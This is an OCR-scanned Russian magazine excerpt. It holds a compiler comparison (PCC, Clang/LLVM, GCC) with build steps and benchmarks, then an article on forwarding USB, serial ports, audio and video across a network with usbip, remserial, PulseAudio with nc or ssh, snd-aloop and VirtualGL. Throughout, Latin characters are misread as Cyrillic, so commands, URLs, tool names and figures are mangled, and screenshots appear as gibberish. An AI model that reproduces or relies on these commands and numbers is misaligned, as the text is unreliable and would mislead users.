^айл оравка Бил іерминал гцр«ы>л ^приі» 

І{Г.е1»і304; ; ргегіі = %сол(1.^а1^еі29б _і 

Ѵісаііізоб > і:аІ1 і32 Ѵ«і:гпсрпр<і8*^ «33^ ів* Еесеіешепсріг іпЬоут^з. ([3 х ів]* « 
І32 О, 132 0>, І32 2] поушѵіті геасЗопІу, П022 

ІктрІЗО? ^ ісиір чц і32 І^аШЗОб. О, Ійізя П022 
Ьг 11 іЫбіріЗО?* ІаЬеІ ііЩ»іеіг^іЗѲ9, ІаЬеі ИЬгЛпсіЗЗО, ігіЬя 11022 

і^.ІІіеиІЗОв:: : ргв^ъ = %И.вІ&в1304 

Іь4б = Іоай »5Ггисі*_І0_Ріие** #і.ійІегг, ліія" *. 11023, ИЬаа 1733 

%47 = иаіі ів** «р^с>яNа№, аііяп 4. Юбя 11023, ЕіЬаа 1733 
ъсаііізи ■ саіі І32 сіьягусг._іо_гііе** ів*, »ГргіпіГ(*іггисг._іс^РіЕЕ* 

%4б, ІВ* явівіепепіртг іпЬоыпОі {[10 ^ іВ]* #,ііг1бн 132 О, І32 0}, 1В* ХД7, 18 
* %33) поиіміпіі, тОЬя 11023 

%48 = Іоа(] 18** СргояНат, аИяп 4, ГоІЬя 11025, ГТЬаа 1733 

саіі ѵрій «11ѵіі,(1(ія^ѵаЬе{іг«(аі1а1а 1{і8* *48>, 164 О, пчсасіаіа 1Ю26> лОртѵ1п;| 

, Г^Ья 11027 

%49 » Іоэгі »іггисі._Г0_ЕіЕЕ** е5ігіегг, аііяп 4. ЩЬя Т102В, тіЬаа 3733 
%са11, 11602 = саіі 18* вѲ 22 _Ь 2 ІіЬѴвгі 1 еп{ } поупніпсі, Т(1Ья 11020 
»саШ,іі603 = СЭІ1 132 {%5і:гисг,_Ш_РН6*, І8*, #1=ргіпіГ{%5Сгисі,_Ш_РІ 

ЕЕ* 1і49. ІВ* рЕлІеоіепСрСг іпЬоула^ {[1230 * ІВ]* 9,ЗЕГІ00, І32 о* І32 0), І8* % 
саІІ.ііБог, 18* %48> поиЕжіпіІ, ісІЬя П020 

саіі ѴОІО §ех11{132 1] погеЕигп полтѵІпіЛ, ЮЬя ИОЗО 
цпг^асІіаЫ?, ІіІЬя ПОЗО 

760,1 10Х ~Г 



А это ассемблер ІК ІІѴМ 

судя по комментариям в исходниках, принадлежал приснопамят- 
ной СаИега. На него долго не обращали внимания, но, видимо, 
в связи с непомерным разрастанием ССС Эндерс Магнуссон в 2007 
году решил его возродить. 

Компилятор состоит из двух частей: раззі проводит пар- 
синг, проверку типов и строит дерево, а ра5з2 — генерирует код. 
Еще имеется деление на фронтенд и бэкенд. Фронтенд — сс — вы- 
полняется пользователем и передает файл бэкенду. Тем не ме- 
нее это уже не оригинальный компилятор 70-х (еще бы — с того 
времени много чего изменилось: появились новые архитектуры, 
стандарт С тоже несколько поменялся...). Было переписано около 
50% кода фронтенда и около 80% бэкенда. В настоящее время за- 
явлена поддержка большинства фич С99. Также включен компиля- 
тор РогІгап-77. Бэкенд С++ же, судя по всему, находится в зачаточ- 
ном состоянии. 

Из преимуществ отмечу размер: он и впрямь очень маленький, 
если сравнивать с 6СС, — в сжатом виде занимает всего 730 Кб. 
Разработчики также заявляют, что скорость компиляции в 5-10 раз 
выше компилятора 6МІІ при таком же качестве кода. 

Получение и установка его достаточно тривиальны. Сначала 
получаем и собираем/ставим библиотеку рсс-ІіЬз: 

$ ы^е1: ІтІ:1:р://рссЛисІсІЛ1:и.5е/-Рі:р/риЬ/рсс-1іЬ5/4-< 

рсс-1іЬ5-20120922.1;§2 
$ 1;аг Х2Ѵ-Р рсс-1іЬ5-20120922.1;§2 
$ ссі рсс-1іЬ5-20120922 
$ ./сопб§иге && таке 

$ зисіо таке іпзііаіі 

Азатем собственно сам компилятор: 

$ ы§е1: -Рі:р://рсс.1исІсІ.11:и.5е/риЬ/рсс/рсс-сиггеп1;.1;§2 
$ 1;аг х 2 ѵТ рсс-сиггеп1; . 1;§2 
$ ССІ рсс-20120922 

$ ,/сопб^иге && таке 

$ зисіо таке іпзііаіі 

Перед компиляцией тестируемых программ понадобилось про- 
извести примерно те же действия, что и в случае с оракловским 
Сотрііег зиііе: установить переменные окружения СС и СХХ равны- 
ми рсс, а для Ьгір2 и ЗоЬп іЬе Ріррег еще и подправить МакеЯІе. 

Библиотеку Воозі по понятным причинам я даже и пытаться 
компилировать не стал. ІтадеМадіск и 0реп551 не собрались. 

И вот результаты теста: 

• Компиляция АрасЬе — 1 мин 43 с, размер исполняемого файла — 
676 763 байта. 



• Размер исполняемого файла ЗоЬп — 178829 байт, бенчмарк 
М05 — 4325с/з. 

• Ьгір2 (размер) — 244061 байт, время сжатия файла — 11 мин45с. 



ІІѴМ и С1АМ6 



Ты наверняка слышал о СІапд и ІІѴМ и не раз задавался вопросом, 
что это такое. СІапд — компилятор языков С-семейства в байткод 
ІІѴМ. Аббревиатура ІІѴМ расшифровывается как Іоѵѵ-ІеѵеІ ѴігШаІ 
МасЫпе. ІІѴМ представляет собой, грубо говоря, виртуальную 
Р15С-машину. «Что? Еще один .МЕТ?» — воскликнешьты. На самом 
деле название не отражает всей сути дела: ЕЕѴМ не является ЛТ- 
компилятором — хотя может (для некоторых языков) выступать в ка- 
честве такового. Он служит для облегчения портирования программ 
на другие платформы. Делается это с помощью промежуточного 
представления кода — ІР. Над ним можно производить всевозмож- 
ные трансформации, после этого он может быть преобразован в ма- 
шинный код — либо динамически (ЛТ-компиляция), либо статически. 
ІР-код поддерживает следующие примитивы: 

• ІЫ — целые числа произвольной разрядности, где N как раз и оз- 
начает разрядность (до восьми миллионов); 

• числасплавающейточкой — ЬаіиіоаС боиЫе и некоторые 
машинно-специфичные типы; 

• х86ттх — поддержка расширений ММХ. Использованиеэтого 
типа довольно ограниченно — например, нельзя создавать мас- 
сивы с ним; 

• ѵоісі — пустоезначение; 

• теіасіаіа — метаданные, могутиспользоваться для оптимиза- 
ции и отладки. 

Помимо примитивов, ІР-код поддерживает производные типы — та- 
кие, например, как указатели, массивы, структуры, функции... 

СІапд является компилятором, использующим ЕЕѴМ. Под- 
держивает он такие языки С-семейства, как С, С++, 0Ь)С и 0Ь)С++. 

В контексте статьи наше внимание привлекают только первые два. 
Из интересных фич компилятора отмечу следующие: 

• диагностическиесообщения. Нет, разумеется, в других компиля- 
торахонитоже есть, но СІапд буквально«тыкаетносом» в ошибку, 
то естьпоказывает кусок кода с точностью до строки и символа, 
гдеон видитошибку или поводдля варнинга; 

• совместимость (частичная) с 6СС, что немаловажно для компиля- 
ции некоторых Ореп Боигсе проектов; 

• поддержка интеграции в ЮЕ; 

• В50-лицензия — это делает возможным встраивать СІапд 
(каки ЕЕѴМ в целом) в коммерческие приложения. 

Из стандартов С компилятор поддерживает то же самое, 
что и 6СС, поэтому остановимся на поддержке С++. 

• Поддерживаются все фичи С++98/03,за исключением поведения 
в некоторых случаях ключевого слова ехрогі — такое поведение, 
к слову, убрали из С++11. 

• ИзфичС++11 поддерживается большинство — даже и те, которых 
нетв 6СС (не поддерживается разве что наследование конструк- 
торов). Заявлена минимальная поддержка сборки мусора и не- 
которые возможности параллелизма. 



^^VМ ПРЕДСТАВЛЯЕТ 
СОБОЙ, ГРУБО ГОВОРЯ, 
ВИРТУАЛЬНУЮ ЯІ5С-МАШИНУ. 
4<ЧТО? ЕЩЕ ОДИН .НЕТ?>^ — 
ВОСКЛИКНЕШЬТЫ 
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иыіхот 



терминал • гот9гопѵі)«$кіор:~/рссчигг*п(/рсс*2012092г/сс/ссот — + х 

файл Правка Вид Терминал Переход ^правка 
ІПІ ^ 

■іаіп(іп( аг^с, сНаг *аг8ѵ[]) 

< 

ІШ сН; 

«іГЛеІ ТІЫІНС 

іігисі ііяеѵаі П, 12; 

(ѵоі(1)8е(ііпео^сІау(&П . Шіі): 

«еп(ІіІ 

рг^пап* » аг8ѵ[0]; 

тЬіІе ((сЬ * ве(орі(аг2С. аг^ѵ, "ОТ:ѴѴ»:Х:г:^:8Іав:р$ѵжх;“)) !» -1) { 

$ѵѵі(сН (сЬ) < 

і<1е^іг>е<1(ІіиіТІРА$2) II с1еГіпе<і(РА5$1) 

сахе ’Х*: /♦ ра55і (ІеЬивв^^в 

ѵкЬіІе (*ор(аг8) 

хміІсЬ (♦оріагв^*) < 

са5е ’Ь’ : ♦♦МвЬо^; Ьгеак; /* Ьиі1<1ігее */ 
са$е •<!* : **<кІеЬо8і Ьгеак; і* <1ес1дгаі1оп$ ♦/ 
сахе *•* : ■*’*е<іеЬи8; Ьгеак; /* раххі ехіі ♦/ 
сахе *!•: ♦♦ісІвЬо^; Ьгеак; /* іпісіаіігасіолх */ 
151, 1-е 37% ^ 



Один из исходников РСС 

Нелишне будет и упомянуть плагин ОгадопЕдд, который позво- 
ляет использовать ССС с ІІѴМ, причем без перекомпиляции перво- 
го. Поскольку размер статьи ограничен, дам ссылку, по которой ты 
можешь узнать о нем подробнее, — ЬіМу/9гХІКс . 

Текущая версия ІІѴМ/СІапд доступна через 5ѴМ — для ее полу- 
чения используй следующие команды (подразумевается, что ты 
находишься в домашнем каталоге): 



итоги ТЕСТОВ 



Начнем с аутсайдера. Им оказался РСС — он не смог скомпилиро- 
вать ни ІтадеМадіек, ни 0реп551. При выполнении бенчмарков 
^оЬп и Ь2Ір2 он также оказался самым медленным из всех. Однако 
в случае компиляции АрасЬе размер выходного файла ЬирсІ ока- 
зался самым маленьким, что может являться плюсом... но только 
при условии, если и другие результаты компиляции окажутся 
соизмеримыми, — а они таковыми не являются. Итог: сегодня РСС 
непригоден для промышленного использования. 

Иная ситуация с остальными компиляторами. Да, оракловский 
компилятор не смог скомпилировать ВоозС но то же самое не смог 
сделать и ССС 4.8. Что же до бенчмарков, то в тесте ^оЬп ССС 4.8, 
безусловно, лидирует, как и в случае с Ь2Ір2, где он незначительно 
опережает предыдущую свою версию. Однако в симметричном 
шифровании 0реп551 оракловский компилятор лидирует... чтобы 
в асимметричном шифровании благополучно затормозить более 
чем вдвое, в то время как остальные держались примерно на одном 
уровне с легким превосходством в симметричном шифровании 
СІапд. По итогам сравнения размеров выигрывает компилятор 
Огасіе, который незначительно опережает СІапд. 

Выбрать победителя оказалось сложновато, но все же, с учетом 
дальнейших перспектив, таковым могу назвать СІапд. Почему 
именно его? Во-первых, он компилирует Воозі — с чем, кроме него, 
справилась только стабильная версия 6СС. Во-вторых, в тестах 
0реп551 он лидирует без явных перекосов в сторону симметрично- 
го шифрования. Ну и в-третьих — сама идея оптимизации с исполь- 
зованием промежуточного кода очень и очень перспективна. □С 



$ 5ѴП со Ітіііір: //11ѵт.ог^/5ѵп/11ѵпі-ргоіес1:/11ѵпі/4-< 

Іігипк Ііѵт 

$ ссі 11ѵт/1;ооІ5 

$ 5ѴП со Іі1;1;р://11ѵт.ог§/5ѵп/11ѵт-ргодес1;/с-Ре/^ 

1;гипк с1ап§ 

$ ССІ с1ап§/1;ооІ5 

$ 5ѴП со Іі1;1;р: //11ѵт.ог§/5ѵп/11ѵт-ргодес1;/4-< 

с1ап^-1:ооІ5-ех1:га/1:гипк ехііга 

% ССІ ~/11ѵт/ргодес1:5 

$ 5ѴП со Іі1;1;р://11ѵт.ог§/5ѵп/11ѵт-ргодес1;/^ 
сотрі1ег-г1:/1:гипк сотрі1ег-г1: 

Процедура сборки и установки, как обычно, тривиальна — 
в каталоге ІІѵт набираешь: 

$ ./сопб§иге --орііітііесі && таке -д4 
$ зисіо таке іпзііаіі 

Должен, однако, отметить, что процедура компиляции 
(если говорить точнее — процедура линковки) кушает изрядно 
памяти, так что если у тебя 2 Гб или меньше, то рекомендую вклю- 
чить своп. Перед компиляцией тестов я установил переменные СС 
и СХХ в СІапд и с1апд++ соответственно и, как и в прошлые разы, 
изменил таке-файлы Ь 2 Ір 2 и ^оЬп. 

На сей раз откомпилировались все тесты — да-да, и Воозі тоже. 
Чтобы его скомпилировать, применялись те же самые команды, 
что и с использованием ССС, только вместо дсс во всех случаях не- 
обходимо писать СІапд. 

Резул ьтаты: 

• Компиляция Воозі — 51мин21с. 

• Компиляция АрасЬе — 2 мин 2 с, размер исполняемого файла — 
813840 байт. 

• Компиляция ІтадеМадіек — 10 мин 10 с. 

• Размер исполняемого файла ЗоЬп — 173 656 байт, бенчмарк 
М05 — 7632 с/5. 

• Ь2Ір2 (размер) — 186 861 байт, время сжатия файла — 9 мин 31 с. 

• Бенчмарк 0реп551АЕ5-СВС-256 при размере блока 8192 — 

39 291,66 тыс. байт/с, Р5А512 — 2202,45Ідп/с. 



БЕЗОПАСНЫЕ 

КОМПИЛЯТОРЫ 



Что же касается безопасности и защиты 
приложений от атак, то тут стоит упомянуть: 

• 6СС РгоРоІісе [ іЬт.со/Тѵ40ді] — расширение 
для 6СС, разработанноеІВМ и предназначен- 
ное для защиты отзІаскзтазЫпдатак; 

• БАРЕСобе ( ЬИ.Іу/ООАООЫ — компилятор, ис- 
пользующий ІІѴМ и СІапд, который вставляет 
рантайм-проверки, чтобы избежатьошибок, 
связанных с тетогуза^еіу: переполнения 
буфера, некорректного освобождения памяти, 
разыменования недействител ьных указате- 
лей итому подобного. 



• Сегодня РгееВЗО 
компилируется не 6СС, 
а СІапд. Это связано с 
тем, в частности, что 
6СС перешел на 6Р13, 
соответственно, воз- 
никли лицензионные 
проблемы, и разработ- 
чики посчитали ра- 
циональным перейти 
на другой компилятор. 

* На ІІѴМ основана 
подсистема ОрепСІ в 
Мае 05X10.5, а іРНопе 
50К использует ОСС 

с бэкендом на ІІѴМ. 

• В отличие от ЭѴМ, 
которая является 
стековой виртуальной 
машиной, ІР-код ІІѴМ 
основан на регистрах. 

* Сборка мусора 
(дагЬаде соііесбоп) — 
автоматическое осво- 
бождение регионов 
памяти, на которые 
никто не ссылается. 



6СС 5.0 



Разработка пятой ветки еще не началась, 

но о ней уже дискутируют в списке рассылки. 

Из предложений хочу отметить следующие: 

• Модульность. Конечно же, разработчики 
понимают, что это будет трудно. Но они также 
осознают и ее преимущества. 

• Сборка мусора. Имеется в виду сборка мусора 
при компиляции в самом компиляторе, не в ком- 
пилируемой программе. 

• Улучшенная поддержка метапрограммирования. 



На диске ты найдешь 
последние версии 
ОСС, РСС и СІапд/ 
ІІѴМ. 



ЫЦу/К1У4ок — 
время от времени 
ОрепВепсНтагкіпд. 
огд проводит тесты 
компиляторов. 
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иыіхот 



Евгений Зобнин (ехесЬіі.ги) 




В начале девяностых создатели УМІХ выпустили 
на рынок операционную систему РІап 9, которая 
позволяла легко и прозрачно получать доступ 
к любым устройствам удаленной машины с по- 
мощью простого монтирования сетевой фай- 
ловой системы. ОС не снискала популярности, 
уступив место классическим никсам, которые 
ВТО время вообще не имели подобной функ- 
циональности. Изменилась ли ситуация сейчас, 
мы попробуем разобраться в этой статье. 



ВВЕДЕНИЕ 



В миксах почти все железные компоненты компа представлены 
в виде доступных для чтения и записи файлов, работать с которыми 
можно с помощью стандартных команд есЬо, са\, дгер и так далее. 
Однако смонтировать эти файлы с удаленной стороны не полу- 
чится, так как их поддержка полностью реализована внутри ядра 
и жестко привязана к локальной машине. Это ограничение было 
устранено в РІап 9 с помощью сетевого РРС-протокола 9Р, кото- 
рый использовался всегда и везде, для доступа как к локальным 
файлам и устройствам, так и к сетевым. В ІІМІХже все осталось 
по-прежнему. 

Тем не менее на сегодняшний день существует несколько вари- 
антов проброса файлов устройств на другую машину средствами 
различных утилит, а также драйверов, использующих в своей 
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> ((гЬ<1«1пі сге^іе-кі ^гЬіЛЭ 

ѵ9Ѳ пздіс лцпФвг поі Тоигчз 
■й_о»Г?е1 Э»05в173<М 
йі_огг«і звее&?е>437Б 
ьт.оггм* эѳевйее^ѳ^г 

Рс№а ей 12 Гіінуііев упісп ілев іЖв&4в^ кВ 

сипгепі сопі'івигв^іоп цэвіэіе 2990163В к:® 

Оеѵісе 9Іі« ъпиі® Ье ігипсвіе®р 
шиІ[1 соггирі сЛвІв впсі гвзиіі іп 
'йоса» Ьецол^ елй сі сМѵіса' аггаге. 

Ѵкі п«гі еіІЬег 

Ч и» вківгм! НІЙ НІА Сг'ЙСОІМИГкбйСІІ 
• і^ілк і^ъв^ ^Пе^еіет Ііпі 
■ гѳгд ОУІ №е СІеѵіде Ісівдігду іИе ?і1е5У5Івя1 
ОрсгАііоп геі^иаей. 

СййШАГнІ '«ІГЬсІНІй /4ІЙѴ/4ІГІУІВ ѵВВ /бйч/іА&і ІРІйГГЛІ сГНій-асІ' ійГГЯІпйійй ыІіГі йхіі і!:й[3е 40 
йгЫйЛ вЬогііпд 



Никогда не пытайся повторно инициализировать ОКВО-хранилище 

работе собственные протоколы и разработки. В этой статье мы 
рассмотрим большинство из них и попробуем перебросить по сети 
иЗВ-устройства, звуковую карту, видеоадаптер и дисковые на- 
копители. 



У5В- И СОМ-ПОРТЫ 



Наверное, чаще всего у пользователей возникает потребность 
перекинуть по сети 115В- или СОМ-порты. Это может быть необ- 
ходимо, чтобы экспортировать устройства и накопители в вирту- 
альную машину, работающую в кластере, подключить различную 
периферию, да и просто иметь доступ к удаленной веб-камере 
с другой машины. В Ыпих для этой цели можно воспользоваться 
изЫр ( изЬір.зоигсеІ'огде.пеі ] — специальным виртуальным хост- 
контроллером 115В (Ѵігіиаі Нозі СопІгоІІег Іпіегі'асе), позволяющим 
экспортировать любое ІІЗВ-устройство с одной машины, а затем 
импортировать с другой, да так, что никакой сторонний софт не за- 
метит разницы между локальным устройством и удаленным. 

Использовать изЫр довольно просто. Во-первых, следует 
установить демон изЬір на серверную машину (ту, с которой будет 
происходить экспорт): 

$ зисіо ар1:-^е1: іпзііаіі изЬір 

Затем необходимо загрузить два ядерных модуля, входящих в пакет: 

$ зисіо шосІргоЬе и5Ьір_соттоп_тосІ 
$ зисіо шосІргоЬе изЬір 

и запустить изЬір-демон: 

$ зисіо изЬірсІ -Р 

Далее смотрим список ІІЗВ-устройств на шине: 

$ зисіо изЬір ЬіпсІ сІгіѵег --1із1: 

Чтобы расшарить устройство с нужным ЬизісІ (например, 1-1.2), про- 
сто вбиваем следующую команду: 

$ зисіо изЬір_ЬіпсІ_сІгіѵег --изЬір 1-1.2 

После этого переходим к клиентской машине, так же устанавли- 
ваем на нее пакет изЬір и загружаем модули (на этот раз вторым 
модулем идет ѵЬсі-ЬссІ): 

$ зисіо ар1:-§е1: іпзііаіі изЬір 
$ зисіо шосІргоЬе изЬір_соттоп_шосІ 

$ зисіо шосІргоЬе ѵЬсі-ЬссІ 

Далее получаем список устройств с серверной машины: 

$ зисіо изЬір --Іізі 192.168.0.101 




ѴігІиаІОІ + ТигЬоѴМС + Епету Теггііогу: Оиаке ѴѴагз 

И подключаем нужное с помощью следующей команды: 

$ зисіо изЬір --аіІіасЬ 192.168.0.101 1-1.2 

Для проверки запускаем ІзизЬ, который должен вывести имя 
подключенного устройства на экран. Далее работаем с устройством 
так, как если бы оно было локальным; устройство появится в ката- 
логе /беѵ, поэтому сразу сработает исіеѵ и девайс будет автоматиче- 
ски распознан и подключен, будь это веб-камера или 115В-флешка. 

С СОМ-портами дело обстоит еще проще. Коннект между двумя 
удаленными портами можно организовать без всяких драйверов, 
с помощью простой утилиты гетзегіаі ( :рссоппр.Ьс.са/геппзегіаІ ). 
Допустим, тебе необходимо соединить порт/сІеѵ/иу50 с удаленной 
машиной. Все, что нужно сделать, — это установить гетзегіаі и за- 
пустить его: 

$ зисіо ар1:-§е1; іпзіаіі гешзегіаі 

$ гешзегіаі -сі -р 23000 -з "115200 гам" /сіеѵ/1;1;у50 & 

где опция -СІ указывает на запуск в режиме демона, -р — сетевой 
порт, -3 — параметры зиу, в данном случае скорость и режим 
работы (подойдет практически для всех случаев). Далее переходим 
на клиентскую машину и запускаем гетзегіаі на ней: 

$ гешзегіаі -сІ -г 192.168.0.101 -р 23000 ^ 

-3 "115200 гам" /сіеѵ/1:1:у50 

Теперь два порта связаны, и можно легко подключать к ним 
оборудование или запускать софт. 



ЗВУКОВУХА 



Переброс звуковой карты на другую машину также одна из частых 
задач, встающих перед пользователями. Это может понадобиться, 
чтобы создать НТРС из старого компа либо организовать полно- 
ценный тонкий клиент, пользователь которого сможет не только 
видеть картинку на экране и управлять курсором, но и запускать 
различные медиаприложения с возможностью проигрывания 
звука. 

Для Ыпих (как, впрочем, и для других никсов) никаких псевдо- 
драйверов, выполняющих подобную функцию, пока не придумано, 
зато проброс аудио можно организовать средствами звуковой 
подсистемы А15А или с помощью звукового сервера РиІзеАисІіо, 
который сегодня предустановлен почти во все сколько-нибудь 
популярные Ыпих-дистрибутивы. Кроме них, конечно, существуют 
и другие аудиосерверы, например профессиональный 1АСК или 
популярный некогда Е50, однако они распространены гораздо 
меньше, поэтому мы их обсуждать не будем. 

Итак, начнем с РиІзеАисІіо как наиболее простого и удобного ва- 
рианта проброса звука. Здесь все настолько просто, насколько во- 
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Искусство сопряжения 



обще возможно. Первое, что необходимо сделать, — это выяснить 
Ю нужного нам аудиовыхода. Делается это с помощью стандартной 
команды расіі (РиІзеАисІіо Сопігоі): 

$ расы 1І5І: I ^гер аІ5а ои і: 

Мате : аІ5а_ои1;ри1: . рсі-0000_00_07 . 0. апа1о§-5І:егео 
Мопіііог Зоигсе: аІ5а_ои1;ри1:. рсі-0000_00_07.0.^ 

апа1о^-5І:егео.топі1:ог 

Мате : аІ5а_ои1;ри1: . рсі-0000_00_07 . 0 . апа1о§-5І:егео . топіііог 
Мопіііог о-Р 5іпк: аІ5а_ои1;ри1:.рсі-0000_00_07.0.4-‘ 
апа1о^-5І:егео 

Нам нужен выходе названием Мопііог Зоигсе, просто копируем 
его полное имя в буфер обмена. Дальше достаточно перенаправить 
выход в сеть с помощью обычного пекаі: 

$ расаі; -г -сі аІ5а_ои1:ри1:.рсі-0000_00_1Ь.0. 
апа1о^-5І:егео. топіііог | пс -1 8888 

а затем завернуть его на вход на стороне клиента: 

$ пс 192.168.1.1 8008 | расаі -р --1а1іепсу-т5ес=5000 
- -ргосе55-1ііте-т5ес=5000 

С той же целью можно использовать 55Н, причем даже не пере- 
ходя на клиентскую машину для выполнения команд: 

$ расаі -г -СІ аІ5а_оиіриі.рсі-0000_00_1Ь.0. <-■ 

апа1о§-5іегео.топііог | ббіі иБег@192. 168.1.1 

"ріау -і гаы -г 44100 -с -б -Ь 16 --Ьц-р-Рег 100" 

Замечу, что работает такая связка неидеально, создавая не- 
большие задержки. В случае прослушивания музыки это не про- 
блема, но если задержки возникают при просмотре видео, устра- 
нить их можно с помощью настроек синхронизации аудио/видео, 
которые естьулюбого вменяемого видеоплеера. 

Если РиІзеАисІіо на машинах не установлен и устанавливать 
его не очень хочется, воспользуйся возможностями ядерного 
АЕЗА-модуля БпсІ-аІоор, позволяющего создать «канал», в кото- 
рый можно вогнать звуковой поток из любого приложения и снять 
его с другого конца. Модуль есть в стандартном комплекте ядра, 
поэтому перед использованием достаточно вызвать тосІргоЬе. 
Сделать это необходимо на передающей машине: 

$ Бисіо тосІргоЬе БпсІ-аІоор 

Далее на той же машине создаем файл -/.азоипсігс и пишем 
в него следующее: 

$ ѵі ~/. азоипсігс 

рст. Ісіе-Раиіі { 
іуре сітіх 

БІаѵе.рст "Ріы: ІоорЬаск^0^0" 

} 

рст.іоор { 

іуре ріи^ 

БІаѵе.рст "Ііы: ІоорЬаск^ 1^0" 

} 



ВОЗМОЖНОСТЬ ПРОБРОСИТЬ 
АУДИО ЧЕРЕЗ СЕТЬ ПОЗВОЛЯЕТ 
ПОДНЯТЬ ГОЛОСОВОЙ ЧАТ 



ОѴ511 

8рѳе(1: 480МЬ/$ (ЫдН) 
и8ВѴѳг$іоп: 1.00 
Оеѵісѳ С1а$$; 00(>№ ) 

Оеѵісе 8иЬсІа$$: 00 
Оеѵісѳ Ргоіосоі: 00 
Махітит ОеІаиП ЕпОроМ 8ігѳ: 8 
ЫитЬег о( Сопіідигаііопс 1 
ѴепсЮг Ю: 05а9 
РгоОис! Ы: а51 1 
Веѵізіоп МитЬег: 1 .00 

СопЛд ЫитЬег 1 

ЫитЬег оГ Іп!ѳі1^е$; 1 
А(!гіЬи1е$: 80 

Ма^оѵѵег ЫееОеО: 500тА 

ІпіегГасе ЫитЬег О 
Ыате: оѵ511 
АПетаіе ЫитЬег 0 
Я(ѵѳп(І.) 

8иЬ С1а$$; 0 
РгоІосоІ: о 

ЫитЬег оГ ЕгЮроіпІз: 1 

ЕпироіШ А(18ге$$: 81 
Оігѳсііоп: іп 

Рей^зЬ I Согтйдиге | АЬои! | 




СІозе I 



Веб-камера, подключенная с помощью изЬір 



Таким образом мы получим своего рода виртуальную звуковую 
карту, с которой сможем снимать звук и отправлять его на другую 
машину. Сделать это можно по 55Н с помощью следующей коман- 
ды, запущенной на принимающей машине: 

$ ББІ 1 -С ІР-отдающей-машины бох -д -і аІБа Іоор ^ 

-і ыаѵ -Ь 24 -г 48к - | ріау -д - 

Здесь запускается звуковой проигрыватель бох (его тоже надо 
установить) на передающей машине, которому в качестве аудио- 
устройства для снятия звука передается имя виртуальной звукову- 
хи (Іоор), а затем снятый аудиопоток передается команде ріау уже 
нелокальной (принимающей) машине, которая проигрывает звук. 

В этом варианте соединения также есть проблема задержек, зато 
он не требует ненавистного многим РиІзеАисІіо. 

Кстати, проблему задержек можно если не решить, то суще- 
ственно снизить, закодировав звуковой поток в МРЗ. Делается это 
так. На передающей стороне запускаются следующие команды: 

$ Бисіо тосІргоЬе БпсІ-аІоор 

$ -р-Ртре§ -і аІБа -ас 2 -і Ьы: ІоорЬаск. 1 .0 <-■ 

-асосіес ІіЬтрЗІате -Ь 128к -і гір 

гір : //ІР- передающей -машины : 6000 & 

Здесь сначала подгружается знакомый нам модуль зпсі-аіоор, 
а затем запускается сервер РРтред. Он снимает звук с виртуаль- 
ной звуковой карты, перекодирует его в МРЗ, а затем формирует 
РТР-поток, который можно будет получить по адресу ІР, порт 6000. 
Чтобы запущенные приложения по умолчанию использовали вир- 
туальную звуковуху, надо создать файл -/.азоипсігс, как в пред- 
ыдущем примере. На клиентской стороне следует создать 
файл — описание РТР-потока (например, /ітр/БІгеапп.БСІр), поме- 
стив в него следующие строки: 

$ ѵі /ітр/Бігеат.БСІр 
о=- 0 0 ІЫ ІР4 ІР-сервера 

с=ІМ ІР4 ІР-сервера 

т=аисІіо 6000 КТР/АѴР 14 

А далее просто запустить МРІауег: 

$ тріауег /ітр/Бігеат. БСІр -геаііу-риіеі </сІеѵ/пи11 
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Арріісаііоп 


ХІІЬ 


ІіЬ6і| |ѴігІиаЮі| 



Орепбі 



еіх 

гепсіегеіі 

ітадез 



Х11 Еѵепіз 



Х11 соттапсіз 



ѴбІТгапзрогІ: 



(орііопаі сотргеззіоп) 



ЗОХБегѵег 



30 Огіѵег 



Арріісаііоп Бегѵег 

(ѴігІиаІбІЗегѵег) 



20 X Бегѵег 



ѴігІиаЮІСІіпІ 



к ипсотргеззесі 
ітадезігеат 



Сііепі 



Меіѵѵогк 



Принцип работы Ѵігіиаібі 



работу и даже смотреть видео. Однако наиболее интересных 
результатов можно достичь, если воспользоваться возможно- 
стями библиотеки ѴігІиаІОІ ( ѵѵѵѵѵѵ.ѵігіиаіді.огд ]. Она позволяет 
перенаправлять 61-команды на удаленный сервер с мощной 
видеокартой, способной быстро обработать команды и сформиро- 
вать картинку, которая затем будет отправлена обратно клиенту. 
Таким образом можно запускать даже самые тяжеловесные игры 
и 30-приложения на слабеньком ноутбуке при условии, что ин- 
тернет-канал позволит без серьезных задержек возвращать 
картинку клиенту. 

Настроить Ѵігіиаібі достаточно просто. Для этого организуй 
Х11-форвардинг, как показано выше, затем скачай и установи 
Ѵігіиаібі на обе машины: 

$ ы§е1; Іі1;1;р://§оо.§1/60а65 
$ зисіо с1рк§ -і ѵіг1:иа1§1* .сІеЬ 



Кстати, используя возможность проброса аудио через сеть, 
можно организовать полноценный голосовой чат с помощью под- 
ручных инструментов. В случае с РиІзеАисІіо достаточно пере- 
кинуть звуковой поток в обе стороны, но сделать то же самое 
с помощью 5пс1-а1оор уже вряд ли получится. Наиболее элегантный 
вариант такой настройки был найден разработчиками ОрепВбО, 
которые использовали для этой цели звуковой сервер/микшер 
аисаі. 

Вся схема запуска аисаі для перенаправления звукового потока 
в обе стороны при этом будет выглядеть примерно следующим 
образом: 

$ аисаі: -1 

$ аисаі: -о - | ббіі и5ег@Ііо5І: аисаі: -і - 

Обе команды необходимо выполнить на обеих машинах. Первая 
запускает аисаі в режиме сервера, вторая перенаправляет звуко- 
вой выход одной машины на вход другой. Единственное условие 
работы такой связки — необходимо запускать все команды от име- 
ни одного и того же пользователя на обеих машинах (с одинаковым 
ШО), иначе аисаі с одной машины не сможет принять звуковой 
поток от аисаі на другой машине (ограничение безопасности). 



ВИДЕОКАРТА 



Существует множество способов перекинуть видеокарту, а точ- 
нее, содержимое экрана на удаленную машину. Наиболее простой 
из них — использовать стандартные клиенты удаленного рабочего 
стола, такие как РОезкІор и ѴМС. Но самым распространенным 
и удобным способом сделать это в СІМІХ остается XII, а если 
точнее — форвардинг протокола XII по 55Н, настроить который 
проще, чем передачу XII напрямую. 

Все, что требуется для этого сделать, — включить форвардинг 
на стороне 55Н-сервера (той машины, на которой будут запускать- 
ся удаленные графические приложения), добавив в файл /еІс/ззЬ/ 
ззЬсІ_сопІід одну строку: 

Х11РогыагсІіп§ уез 

и перезагрузив сервер: 



После этого останови на серверной машине Х-сервер, например 
прибив логин-менеджер 60М: 

$ зисіо 5І:ор §с1т 

Теперь запусти на серверной машине конфигуратор Ѵігіиаібі, 
который внесет правки в конфигХ.огд, подменит Орепбі- 
библиотеку и сделает другую грязную работу за тебя: 

$ зисіо /ор1:/Ѵіг1:иа1СІ/Ьіп/ѵ§І5егѵег_соп1і§ ^ 

